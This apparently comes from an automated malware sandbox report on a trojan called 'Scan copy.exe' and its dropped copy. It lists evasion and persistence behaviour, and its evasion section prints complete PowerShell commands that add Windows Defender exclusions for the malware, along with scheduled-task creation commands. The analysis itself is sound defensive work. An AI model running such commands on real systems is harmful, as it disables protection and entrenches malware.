                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: 46E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: 8770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: 6E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: 9770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: A770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: 4FE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: 9260000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: 8DC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: A260000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory allocated: B260000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5149Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6249Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 402Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exe TID: 6308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep count: 5149 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 339 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exe TID: 7384Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe TID: 7604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: vLQwEscoQr.exe, 00000014.00000002.1320615197.0000000001258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: Scan copy.exe, 0000000A.00000002.2501554118.0000000000D18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                Source: C:\Users\user\Desktop\Scan copy.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 20_2_0040317B mov eax, dword ptr fs:[00000030h]20_2_0040317B
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 20_2_00402B7C GetProcessHeap,HeapAlloc,20_2_00402B7C
                Source: C:\Users\user\Desktop\Scan copy.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeMemory written: C:\Users\user\Desktop\Scan copy.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeMemory written: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeProcess created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeProcess created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Users\user\Desktop\Scan copy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Scan copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
